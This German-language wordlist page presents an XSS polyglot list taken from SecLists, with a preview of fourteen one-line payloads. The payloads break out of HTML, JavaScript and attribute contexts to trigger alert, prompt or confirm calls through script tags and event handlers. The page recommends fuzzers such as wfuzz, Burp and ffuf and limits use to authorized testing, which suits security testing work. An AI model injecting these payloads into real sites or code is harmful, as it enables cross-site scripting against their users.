Skip to content
cyberwordlists
Fuzzing1.6 KB

XSS Polyglots

Einzeilige XSS-Polyglots, gestaltet, um aus vielen verschiedenen HTML-/JS-/Attribut-Kontexten gleichzeitig auszubrechen und auszulösen. Effizient, wenn du pro Feld nur einen Testwert injizieren kannst.

Quelle ansehen
Größe
1.6 KB
Kategorie
Fuzzing
Quelle
danielmiessler/SecLists
Lizenz
MIT
Empfohlene Tools
wfuzzburpffuf

Vorschau

Die ersten 14 Einträge. Lade die vollständige Liste (1.6 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head xss-polyglots-seclists.txt1.6 KB
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Einzeilige XSS-Polyglots, gestaltet, um aus vielen verschiedenen HTML-/JS-/Attribut-Kontexten gleichzeitig auszubrechen und auszulösen. Effizient, wenn du pro Feld nur einen Testwert injizieren kannst.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 1.6 KB und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.